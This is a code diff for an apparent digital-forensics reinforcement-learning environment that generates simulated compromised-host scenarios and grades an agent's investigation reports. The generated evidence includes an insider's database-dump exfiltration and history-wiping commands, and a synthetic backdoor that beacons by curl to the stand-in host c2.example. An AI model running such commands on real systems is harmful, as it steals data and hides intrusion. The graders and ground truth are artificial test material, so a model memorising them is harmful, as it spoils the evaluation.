227
+ bash_history=bash,
228
+ modified_files=modified_files,
229
+ modified_paths=[f"/usr/lib/node_modules/{pkg}/postinstall.js", ctx.backdoor_path],
230
+ timeline=timeline,
231
+ )
232
+
233
+
234
+ # ---------------------------------------------------------------------------
235
+ # Pattern 5 — insider threat: legit user exfiltrates db from internal network
236
+ # ---------------------------------------------------------------------------
237
+
238
+ def insider(ctx):
239
+ user, ip, host = ctx.user, ctx.ip, ctx.host
240
+ ts = ctx.ts_base
241
+ # insider uses internal network, not public IP, so override
242
+ auth = [
243
+ f"{_fmt_ts(ts)} {host} sshd[415]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
244
+ f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/mysqldump --all-databases",
245
+ f"{_fmt_ts(ts + timedelta(minutes=5))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/rsync -av /var/lib/mysql/dump.sql /tmp/.staging",
246
+ ]
247
+ bash = (
248
+ f"sudo mysqldump --all-databases > /var/lib/mysql/dump.sql\n"
249
+ f"sudo rsync -av /var/lib/mysql/dump.sql /tmp/.staging/\n"
250
+ f"scp /tmp/.staging/dump.sql {user}@laptop.internal:/tmp/\n"
251
+ f"rm /tmp/.staging/dump.sql\n"
252
+ f"history -c\n"
253
+ )
254
+ dump_content = b"-- MySQL dump (exfiltrated)\nCREATE TABLE users (id INT, email VARCHAR(255));\n"
255
+ staging_content = b"-- staged copy\n" + dump_content
256
+ modified_files = {
257
+ "/var/lib/mysql/dump.sql": dump_content,
258
+ "/tmp/.staging/dump.sql": staging_content,
259
+ ctx.backdoor_path: ctx.backdoor_bytes,
260
+ }
261
+ timeline = [
262
+ {"phase": "login", "detail": f"pubkey from internal {ip} (legit creds abused)"},
263
+ {"phase": "recon", "detail": "ls /var/lib/mysql"},
264
+ {"phase": "privesc", "detail": "user already had sudo"},
265
+ {"phase": "persistence", "detail": "staging dir /tmp/.staging persists data"},
266
+ {"phase": "exfil", "detail": "scp dump.sql to laptop.internal"},
267
+ ]
268
+ return dict(
269
+ pattern_tag="insider",
270
+ auth_log_lines=auth,
271
+ bash_history=bash,
272
+ modified_files=modified_files,
273
+ modified_paths=[
274
+ "/var/lib/mysql/dump.sql",
275
+ "/tmp/.staging/dump.sql",
276
+ ctx.backdoor_path,
277
+ ],
278
+ timeline=timeline,
279
+ )
280
+
281
+
282
+ PATTERNS = {
283
+ "ssh_brute": ssh_brute,
284
+ "ssh_key_theft": ssh_key_theft,
285
+ "webshell": webshell,
286
+ "supply_chain": supply_chain,
287
+ "insider": insider,
288
+ }
server/forensic_shell_environment.py CHANGED
@@ -11,11 +11,12 @@ a reward in [0.0, 1.0] on the terminal step.
11
 
12
  import hashlib
13
  import os
 
14
  from typing import Dict, List, Optional, Tuple
15
  from uuid import uuid4
16
 
17
  from openenv.core.env_server.interfaces import Environment
18
- from openenv.core.env_server.types import State
19
 
20
  try:
21
  from ..models import ForensicShellAction, ForensicShellObservation
@@ -24,14 +25,49 @@ except ImportError:
24
 
25
  try:
26
  from .grader import grade
 
27
  from .scenarios import DEFAULT_TASK_ID, SCENARIOS
28
  except ImportError:
29
- from grader import grade
30
- from scenarios import DEFAULT_TASK_ID, SCENARIOS
 
31
 
32
 
33
  MAX_STEPS_PER_EPISODE = 30
34
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
35
 
36
  def _as_bytes(content) -> bytes:
37
  if isinstance(content, bytes):
@@ -68,22 +104,47 @@ class ForensicShellEnvironment(Environment):
68
  self._fs: Dict[str, object] = {}
69
  self._done: bool = False
70
  self._steps_used: int = 0
 
 
 
71
 
72
  # ---- episode lifecycle ---------------------------------------------------
73
 
74
  def reset(
75
- self, task_id: Optional[str] = None, **kwargs
 
 
 
 
 
76
  ) -> ForensicShellObservation:
77
- env_task = os.getenv("FORENSIC_TASK_ID")
78
- chosen = task_id or env_task or DEFAULT_TASK_ID
79
- if chosen not in SCENARIOS:
80
- chosen = DEFAULT_TASK_ID
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
81
 
82
- self._task_id = chosen
83
- self._scenario = SCENARIOS[chosen]
84
  self._fs = dict(self._scenario["filesystem"])
85
  self._done = False
86
  self._steps_used = 0
 
 
 
87
  self._state = State(episode_id=str(uuid4()), step_count=0)
88
 
89
  return ForensicShellObservation(
@@ -142,12 +203,16 @@ class ForensicShellEnvironment(Environment):
142
  return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
143
 
144
  if verb == "read_file":
145
- out, err = self._do_read_file(action.path or "", action.max_bytes or 2048)
146
- return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
 
 
147
 
148
  if verb == "grep":
149
- out, err = self._do_grep(action.pattern or "", action.path or "")
150
- return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
 
 
151
 
152
  if verb == "stat":
153
  out, err = self._do_stat(action.path or "")
@@ -173,6 +238,25 @@ class ForensicShellEnvironment(Environment):
173
  reward=0.0,
174
  )
175
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
176
  # ---- action primitives ---------------------------------------------------
177
 
178
  def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
@@ -284,8 +368,37 @@ class ForensicShellEnvironment(Environment):
284
  metadata=meta,
285
  )
286
 
287
- # ---- state property ------------------------------------------------------
288
 
289
  @property
290
  def state(self) -> State:
291
  return self._state
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
11
 
12
  import hashlib
13
  import os
14
+ from pathlib import Path
15
  from typing import Dict, List, Optional, Tuple
16
  from uuid import uuid4
17
 
18
  from openenv.core.env_server.interfaces import Environment
19
+ from openenv.core.env_server.types import EnvironmentMetadata, State
20
 
21
  try:
22
  from ..models import ForensicShellAction, ForensicShellObservation
 
25
 
26
  try:
27
  from .grader import grade
28
+ from .scenario_generator import generate_scenario
29
  from .scenarios import DEFAULT_TASK_ID, SCENARIOS
30
  except ImportError:
31
+ from grader import grade # type: ignore
32
+ from scenario_generator import generate_scenario # type: ignore
33
+ from scenarios import DEFAULT_TASK_ID, SCENARIOS # type: ignore
34
 
35
 
36
  MAX_STEPS_PER_EPISODE = 30
37
 
38
+ # Exploration shaping reward — small positive reward the first time the agent
39
+ # reads one of the scenario's "canonical forensic artifacts" (auth.log, bash
40
+ # histories, cron files, backdoor path, etc.). Capped so the terminal grader
41
+ # reward always dominates the trajectory return.
42
+ SHAPING_REWARD_PER_READ = 0.02
43
+ SHAPING_REWARD_CAP = 0.10
44
+
45
+
46
+ def _canonical_artifacts(scenario: dict) -> set:
47
+ """
48
+ Pick out the set of paths in a scenario that a good investigator *should*
49
+ read. For hand-authored scenarios we use the ground-truth modified_files
50
+ plus a fixed set of classic forensic log paths. For generated scenarios we
51
+ also include the bash history of the compromised user.
52
+ """
53
+ gt = scenario.get("ground_truth", {}) or {}
54
+ paths: set = set()
55
+ paths.update(gt.get("modified_files", []) or [])
56
+ for p in (
57
+ "/var/log/auth.log",
58
+ "/var/log/auth.log.1",
59
+ "/etc/passwd",
60
+ "/etc/shadow",
61
+ ):
62
+ if p in scenario.get("filesystem", {}):
63
+ paths.add(p)
64
+ user = gt.get("compromised_user")
65
+ if user:
66
+ bh = f"/home/{user}/.bash_history"
67
+ if bh in scenario.get("filesystem", {}):
68
+ paths.add(bh)
69
+ return paths
70
+
71
 
72
  def _as_bytes(content) -> bytes:
73
  if isinstance(content, bytes):
 
104
  self._fs: Dict[str, object] = {}
105
  self._done: bool = False
106
  self._steps_used: int = 0
107
+ self._useful_read: set = set() # paths already rewarded
108
+ self._shaping_total: float = 0.0 # running sum, capped at SHAPING_REWARD_CAP
109
+ self._canonical: set = set() # per-episode canonical artifact set
110
 
111
  # ---- episode lifecycle ---------------------------------------------------
112
 
113
  def reset(
114
+ self,
115
+ task_id: Optional[str] = None,
116
+ seed: Optional[int] = None,
117
+ difficulty: Optional[int] = None,
118
+ pattern: Optional[str] = None,
119
+ **kwargs,
120
  ) -> ForensicShellObservation:
121
+ """
122
+ Load either a hand-authored scenario (by task_id) OR a procedurally
123
+ generated one (by seed+difficulty+pattern). If seed is given, generator
124
+ wins; otherwise fall back to task_id lookup, then DEFAULT_TASK_ID.
125
+ """
126
+ if seed is not None:
127
+ scenario = generate_scenario(
128
+ seed=int(seed),
129
+ difficulty=int(difficulty) if difficulty is not None else 3,
130
+ pattern=pattern,
131
+ )
132
+ self._task_id = scenario["task_id"]
133
+ self._scenario = scenario
134
+ else:
135
+ env_task = os.getenv("FORENSIC_TASK_ID")
136
+ chosen = task_id or env_task or DEFAULT_TASK_ID
137
+ if chosen not in SCENARIOS:
138
+ chosen = DEFAULT_TASK_ID
139
+ self._task_id = chosen
140
+ self._scenario = SCENARIOS[chosen]
141
 
 
 
142
  self._fs = dict(self._scenario["filesystem"])
143
  self._done = False
144
  self._steps_used = 0
145
+ self._useful_read = set()
146
+ self._shaping_total = 0.0
147
+ self._canonical = _canonical_artifacts(self._scenario)
148
  self._state = State(episode_id=str(uuid4()), step_count=0)
149
 
150
  return ForensicShellObservation(
 
203
  return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
204
 
205
  if verb == "read_file":
206
+ path = action.path or ""
207
+ out, err = self._do_read_file(path, action.max_bytes or 2048)
208
+ shaped = self._award_shaping(path) if err is None else 0.0
209
+ return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
210
 
211
  if verb == "grep":
212
+ path = action.path or ""
213
+ out, err = self._do_grep(action.pattern or "", path)
214
+ shaped = self._award_shaping(path) if err is None else 0.0
215
+ return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
216
 
217
  if verb == "stat":
218
  out, err = self._do_stat(action.path or "")
 
238
  reward=0.0,
239
  )
240
 
241
+ # ---- shaping reward -----------------------------------------------------
242
+
243
+ def _award_shaping(self, path: str) -> float:
244
+ """
245
+ Return +SHAPING_REWARD_PER_READ the first time the agent touches a
246
+ canonical forensic artifact, capped so the cumulative shaping stays
247
+ <= SHAPING_REWARD_CAP across the episode.
248
+ """
249
+ if not path or path not in self._canonical:
250
+ return 0.0
251
+ if path in self._useful_read:
252
+ return 0.0
253
+ if self._shaping_total + 1e-9 >= SHAPING_REWARD_CAP:
254
+ return 0.0
255
+ self._useful_read.add(path)
256
+ grant = min(SHAPING_REWARD_PER_READ, SHAPING_REWARD_CAP - self._shaping_total)
257
+ self._shaping_total += grant
258
+ return float(grant)
259
+
260
  # ---- action primitives ---------------------------------------------------
261
 
262
  def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
 
368
  metadata=meta,
369
  )
370
 
371
+ # ---- state + metadata ----------------------------------------------------
372
 
373
  @property
374
  def state(self) -> State:
375
  return self._state
376
+
377
+ def get_metadata(self) -> EnvironmentMetadata:
378
+ """
379
+ Override the OpenEnv default to populate the /metadata endpoint with a real
380
+ name, description, embedded README, version, author, and docs URL — instead
381
+ of the boilerplate auto-derived from the class name.
382
+ """
383
+ readme_path = Path(__file__).resolve().parent.parent / "README.md"
384
+ readme_content: Optional[str] = None
385
+ if readme_path.exists():
386
+ try:
387
+ readme_content = readme_path.read_text(encoding="utf-8")
388
+ except OSError:
389
+ readme_content = None
390
+ return EnvironmentMetadata(
391
+ name="ForensicShell",
392
+ description=(
393
+ "Digital-forensics investigation environment for OpenEnv RL. The "
394
+ "agent reads logs, hashes backdoors, and reconstructs attacker "
395
+ "kill-chains across 5 attack patterns and 5 difficulty tiers. "
396
+ "Procedural scenarios via deterministic seeds; deterministic "
397
+ "graders return rewards in [0, 1] with partial credit (Jaccard, "
398
+ "F1, Kendall-tau)."
399
+ ),
400
+ readme_content=readme_content,
401
+ version="0.2.0",
402
+ author="yashppawar",
403
+ documentation_url="https://huggingface.co/spaces/yashppawar/forensic-shell",
404
+ )
server/grader.py CHANGED
@@ -122,9 +122,26 @@ GRADERS = {
122
  }
123
 
124
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
125
  def grade(task_id: str, report: Dict, truth: Dict) -> float:
126
  """Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
127
- fn = GRADERS.get(task_id)
 
 
 
128
  if fn is None:
129
  return 0.0
130
  score = fn(report or {}, truth or {})
 
122
  }
123
 
124
 
125
+ def _grade_generic(report: Dict, truth: Dict) -> float:
126
+ """
127
+ Dispatcher for procedurally generated scenarios. Picks the right sub-grader
128
+ by inspecting which fields are present in the ground-truth dict. This keeps
129
+ the grader agnostic to task_id naming and lets the generator add richer
130
+ fields without touching this module.
131
+ """
132
+ if "timeline" in truth:
133
+ return _grade_t3_timeline(report, truth)
134
+ if "backdoor_sha256" in truth:
135
+ return _grade_t2_modified(report, truth)
136
+ return _grade_t1_login(report, truth)
137
+
138
+
139
  def grade(task_id: str, report: Dict, truth: Dict) -> float:
140
  """Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
141
+ if task_id and task_id.startswith("gen_"):
142
+ fn = _grade_generic
143
+ else:
144
+ fn = GRADERS.get(task_id)
145
  if fn is None:
146
  return 0.0
147
  score = fn(report or {}, truth or {})
server/name_pools.py ADDED
@@ -0,0 +1,62 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Deterministic pools used by scenario_generator.py to sample usernames, hostnames,
3
+ and IP addresses. Everything public-facing lives in RFC 5737 / RFC 3849 ranges so
4
+ the synthetic data can never collide with real production IPs.
5
+ """
6
+
7
+ # 40 common names + a few IT-flavored accounts. Excludes 'root' from the compromise
8
+ # target pool because it's structurally weird ("root was compromised via ssh brute")
9
+ # even though real incidents exist.
10
+ USERNAMES = [
11
+ "alice", "bob", "carol", "dave", "eve", "frank", "grace", "heidi",
12
+ "ivan", "judy", "ken", "leo", "mia", "noah", "olivia", "peter",
13
+ "quinn", "ruby", "sam", "tina", "ursula", "vince", "wendy", "xander",
14
+ "yara", "zach", "maya", "theo", "lara", "jonas",
15
+ "devops", "deploy", "ci", "jenkins", "dbuser", "webops", "svc-nginx",
16
+ "releng", "admin2", "ops",
17
+ ]
18
+
19
+ # Decoy (benign) user accounts used to populate /etc/passwd and /home.
20
+ DECOY_USERS = [
21
+ "guest", "backup", "mail", "www-data", "postfix", "systemd-network",
22
+ ]
23
+
24
+ HOSTNAMES = [
25
+ "webhost", "db01", "api-gateway", "worker-03", "cache-redis",
26
+ "staging", "bastion", "ingest", "ci-runner", "monitoring",
27
+ "edge-01", "payments", "search-indexer", "log-agg", "auth-svc",
28
+ ]
29
+
30
+ # RFC 5737 "documentation" ranges — safe to use, never routable.
31
+ PUBLIC_CIDRS = [
32
+ "192.0.2.", # TEST-NET-1
33
+ "198.51.100.", # TEST-NET-2
34
+ "203.0.113.", # TEST-NET-3
35
+ ]
36
+
37
+ # RFC 1918 private space — used for legit internal traffic noise.
38
+ INTERNAL_CIDRS = [
39
+ "10.0.0.",
40
+ "10.0.1.",
41
+ "172.16.0.",
42
+ "192.168.1.",
43
+ ]
44
+
45
+
46
+ def sample_public_ip(rng) -> str:
47
+ """Sample an attacker-looking IP from RFC 5737 test ranges."""
48
+ return rng.choice(PUBLIC_CIDRS) + str(rng.randint(2, 254))
49
+
50
+
51
+ def sample_internal_ip(rng) -> str:
52
+ """Sample a legit-looking internal IP from RFC 1918."""
53
+ return rng.choice(INTERNAL_CIDRS) + str(rng.randint(2, 254))
54
+
55
+
56
+ def sample_username(rng, exclude=()) -> str:
57
+ candidates = [u for u in USERNAMES if u not in exclude]
58
+ return rng.choice(candidates)
59
+
60
+
61
+ def sample_hostname(rng) -> str:
62
+ return rng.choice(HOSTNAMES)
server/scenario_generator.py ADDED
@@ -0,0 +1,315 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Procedural scenario generator for ForensicShell.
3
+
4
+ Pure function of (seed, difficulty, pattern). Identical inputs always produce
5
+ identical scenarios, so seeds work as train/val/test splits and make curricula
6
+ reproducible. No global random state is touched.
7
+
8
+ Public API:
9
+ generate_scenario(seed, difficulty=3, pattern=None) -> dict
10
+
11
+ The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in
12
+ scenarios.py — it is a drop-in replacement the env can load through reset().
13
+
14
+ Difficulty tiers:
15
+ 1 easy user + ip
16
+ 2 medium + modified_files + backdoor_sha256
17
+ 3 medium+ same as 2 but more noise
18
+ 4 hard + timeline, with red-herring content
19
+ 5 hard+ same as 4 with extra red herrings and more complex timeline
20
+ """
21
+
22
+ from __future__ import annotations
23
+
24
+ import hashlib
25
+ import random
26
+ from datetime import datetime, timedelta
27
+ from types import SimpleNamespace
28
+ from typing import Dict, Optional
29
+
30
+ from .attack_patterns import PATTERNS
31
+ from .name_pools import (
32
+ DECOY_USERS,
33
+ HOSTNAMES,
34
+ sample_hostname,
35
+ sample_internal_ip,
36
+ sample_public_ip,
37
+ sample_username,
38
+ )
39
+
40
+
41
+ # ---------------------------------------------------------------------------
42
+ # Deterministic seed → backdoor bytes
43
+ # ---------------------------------------------------------------------------
44
+
45
+ def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
46
+ """
47
+ Return (bytes, sha256_hex, short_slug). Byte content is deterministic in
48
+ (seed, pattern) so two generated scenarios with the same seed/pattern have
49
+ the same SHA256 — matches what the grader will compare against.
50
+ """
51
+ short = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]
52
+ header = (
53
+ f"#!/bin/sh\n"
54
+ f"# synthetic payload {pattern}\n"
55
+ f"# seed={seed} slug={short}\n"
56
+ ).encode()
57
+ body = (
58
+ f"while :; do\n"
59
+ f" curl -s -X POST http://c2.example/beacon -d \"id={short}\"\n"
60
+ f" sleep 60\n"
61
+ f"done\n"
62
+ ).encode()
63
+ payload = header + body + hashlib.sha256(f"{seed}|{pattern}".encode()).digest()
64
+ return payload, hashlib.sha256(payload).hexdigest(), short
65
+
66
+
67
+ def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
68
+ """Where the pattern drops its persistence blob."""
69
+ if pattern_tag == "webshell":
70
+ return f"/var/www/html/.{short}.bin"
71
+ if pattern_tag == "supply_chain":
72
+ return f"/tmp/.{short}"
73
+ if pattern_tag == "insider":
74
+ return "/tmp/.staging/dump.sql"
75
+ if pattern_tag == "ssh_key_theft":
76
+ return f"/usr/local/sbin/.{short}"
77
+ return f"/usr/local/bin/.{short}"
78
+
79
+
80
+ # ---------------------------------------------------------------------------
81
+ # Filesystem + ground-truth assembly
82
+ # ---------------------------------------------------------------------------
83
+
84
+ def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
85
+ """Render benign, plausible auth log entries to pad the log."""
86
+ out = []
87
+ for i in range(lines):
88
+ ts = ts_base - timedelta(hours=rng.randint(1, 72), minutes=rng.randint(0, 59))
89
+ who = rng.choice(["ops", "alice", "bob", "jenkins", "monitoring", "deploy"])
90
+ internal = "10.0.0." + str(rng.randint(2, 200))
91
+ kind = rng.choice(["Accepted publickey", "session opened", "Received disconnect"])
92
+ if kind == "Accepted publickey":
93
+ out.append(
94
+ f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
95
+ f"Accepted publickey for {who} from {internal} port {rng.randint(30000, 65000)} ssh2"
96
+ )
97
+ elif kind == "session opened":
98
+ out.append(
99
+ f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
100
+ f"pam_unix(sshd:session): session opened for user {who} by (uid=0)"
101
+ )
102
+ else:
103
+ out.append(
104
+ f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
105
+ f"Received disconnect from {internal} port {rng.randint(30000, 65000)}:11: disconnected by user"
106
+ )
107
+ return out
108
+
109
+
110
+ def _passwd_file(main_user: str, rng) -> str:
111
+ users = list(DECOY_USERS) + [main_user]
112
+ rng.shuffle(users)
113
+ lines = ["root:x:0:0:root:/root:/bin/bash"]
114
+ uid = 1000
115
+ for u in users:
116
+ lines.append(f"{u}:x:{uid}:{uid}:{u.title()},,,:/home/{u}:/bin/bash")
117
+ uid += 1
118
+ return "\n".join(lines) + "\n"
119
+
120
+
121
+ def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
122
+ """
123
+ Inject decoy content at difficulty >= 4.
124
+ Returns a dict of extra filesystem entries. None of these should end up in
125
+ ground_truth.modified_files.
126
+
127
+ intensity: 1 (diff 4) or 2 (diff 5+).
128
+ """
129
+ extras = {}
130
+
131
+ # 1. Decoy auth.log.1 with a failed-login probe from an unrelated IP
132
+ decoy_ip = sample_public_ip(rng)
133
+ extras["/var/log/auth.log.1"] = (
134
+ f"{(ts_base - timedelta(days=1)).strftime('%b %d %H:%M:%S')} {host} "
135
+ f"sshd[101]: Failed password for invalid user admin from {decoy_ip} "
136
+ f"port {rng.randint(30000, 65000)} ssh2\n"
137
+ f"{(ts_base - timedelta(days=1, minutes=-3)).strftime('%b %d %H:%M:%S')} {host} "
138
+ f"sshd[104]: Received disconnect from {decoy_ip}: [preauth]\n"
139
+ )
140
+
141
+ # 2. A decoy user's bash_history with suspicious-looking-but-benign commands
142
+ decoy_user = rng.choice(DECOY_USERS)
143
+ extras[f"/home/{decoy_user}/.bash_history"] = (
144
+ "ls -la\n"
145
+ "sudo systemctl status cron\n"
146
+ "curl https://api.github.com/users/torvalds\n"
147
+ "python3 -m http.server 8000 &\n"
148
+ "pkill -f http.server\n"
149
+ )
150
+
151
+ if intensity >= 2:
152
+ # 3. A /tmp/.cache binary with random bytes — agent might stat/sha it and submit wrongly
153
+ junk = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4
154
+ extras["/tmp/.cache"] = junk
155
+
156
+ # 4. A decoy cron that looks suspicious but is benign
157
+ extras["/etc/cron.d/backup-nightly"] = (
158
+ "# Nightly backup — owned by ops team\n"
159
+ "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
160
+ )
161
+
162
+ return extras
163
+
164
+
165
+ # ---------------------------------------------------------------------------
166
+ # Main public function
167
+ # ---------------------------------------------------------------------------
168
+
169
+ def generate_scenario(
170
+ seed: int,
171
+ difficulty: int = 3,
172
+ pattern: Optional[str] = None,
173
+ ) -> Dict:
174
+ """
175
+ Deterministic scenario generator.
176
+
177
+ Args:
178
+ seed: any integer — identical inputs yield identical scenarios
179
+ difficulty: 1..5 (clamped)
180
+ pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed
181
+
182
+ Returns:
183
+ dict with keys: task_id, difficulty, description, filesystem, ground_truth
184
+ """
185
+ if difficulty < 1:
186
+ difficulty = 1
187
+ if difficulty > 5:
188
+ difficulty = 5
189
+
190
+ rng = random.Random(int(seed))
191
+
192
+ # 1. pick pattern
193
+ if pattern is None:
194
+ pattern = rng.choice(list(PATTERNS.keys()))
195
+ if pattern not in PATTERNS:
196
+ raise ValueError(f"unknown pattern: {pattern}")
197
+
198
+ # 2. sample entities
199
+ host = sample_hostname(rng)
200
+ main_user = sample_username(rng)
201
+ if pattern == "insider":
202
+ attacker_ip = sample_internal_ip(rng)
203
+ else:
204
+ attacker_ip = sample_public_ip(rng)
205
+
206
+ # 3. base timestamp — always in 2025, deterministic
207
+ day_offset = rng.randint(0, 365)
208
+ hour = rng.randint(8, 22)
209
+ minute = rng.randint(0, 59)
210
+ ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)
211
+
212
+ # 4. synthesize backdoor payload
213
+ bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern)
214
+ bd_path = _backdoor_path_for(pattern, short, main_user)
215
+
216
+ ctx = SimpleNamespace(
217
+ rng=rng,
218
+ user=main_user,
219
+ ip=attacker_ip,
220
+ host=host,
221
+ ts_base=ts_base,
222
+ backdoor_bytes=bd_bytes,
223
+ backdoor_sha256=bd_sha,
224
+ backdoor_path=bd_path,
225
+ short=short,
226
+ )
227
+
228
+ # 5. run the pattern template
229
+ pattern_fn = PATTERNS[pattern]
230
+ result = pattern_fn(ctx)
231
+
232
+ # 6. build filesystem
233
+ noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
234
+ auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"
235
+
236
+ filesystem: Dict[str, object] = {
237
+ "/var/log/auth.log": auth_log,
238
+ f"/home/{main_user}/.bash_history": result["bash_history"],
239
+ "/etc/passwd": _passwd_file(main_user, rng),
240
+ "/etc/hostname": f"{host}\n",
241
+ f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
242
+ }
243
+ # add pattern-specific modified files
244
+ for path, content in result["modified_files"].items():
245
+ filesystem[path] = content
246
+
247
+ # 7. red herrings
248
+ if difficulty >= 4:
249
+ intensity = 1 if difficulty == 4 else 2
250
+ herrings = _red_herrings(rng, host, ts_base, intensity)
251
+ for path, content in herrings.items():
252
+ if path in filesystem:
253
+ continue # never overwrite a real artifact
254
+ filesystem[path] = content
255
+
256
+ # 8. path-collision sanity check (duplicate keys impossible in a dict, but
257
+ # ensure every ground-truth path actually exists in the filesystem)
258
+ for p in result["modified_paths"]:
259
+ assert p in filesystem, f"ground-truth path not in filesystem: {p}"
260
+
261
+ # 9. assemble ground truth by difficulty tier
262
+ gt: Dict = {
263
+ "compromised_user": main_user,
264
+ "initial_ip": attacker_ip,
265
+ }
266
+ if difficulty >= 2:
267
+ gt["modified_files"] = list(result["modified_paths"])
268
+ gt["backdoor_sha256"] = bd_sha
269
+ if difficulty >= 4:
270
+ gt["timeline"] = list(result["timeline"])
271
+
272
+ task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}"
273
+
274
+ description = _describe(difficulty, pattern, main_user, host)
275
+
276
+ return {
277
+ "task_id": task_id,
278
+ "difficulty": _difficulty_label(difficulty),
279
+ "description": description,
280
+ "filesystem": filesystem,
281
+ "ground_truth": gt,
282
+ }
283
+
284
+
285
+ # ---------------------------------------------------------------------------
286
+ # Small helpers
287
+ # ---------------------------------------------------------------------------
288
+
289
+ def _difficulty_label(d: int) -> str:
290
+ return {1: "easy", 2: "medium", 3: "medium", 4: "hard", 5: "hard"}.get(d, "medium")
291
+
292
+
293
+ def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
294
+ base = (
295
+ f"Host '{host}' was compromised. Investigate the filesystem to determine "
296
+ f"what happened. Start by reading /var/log/auth.log and the shell histories "
297
+ f"under /home."
298
+ )
299
+ if difficulty == 1:
300
+ return (
301
+ f"{base} Report: compromised_user and initial_ip only. "
302
+ f"(Pattern: {pattern})"
303
+ )
304
+ if difficulty in (2, 3):
305
+ return (
306
+ f"{base} Report: compromised_user, initial_ip, modified_files "
307
+ f"(absolute paths), and the SHA256 of the attacker-dropped backdoor. "
308
+ f"(Pattern: {pattern})"
309
+ )
310
+ return (
311
+ f"{base} Report: compromised_user, initial_ip, modified_files, "
312
+ f"backdoor_sha256, AND an ordered kill-chain timeline with phases "
313
+ f"login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
314
+ f"present. (Pattern: {pattern})"
315
+ )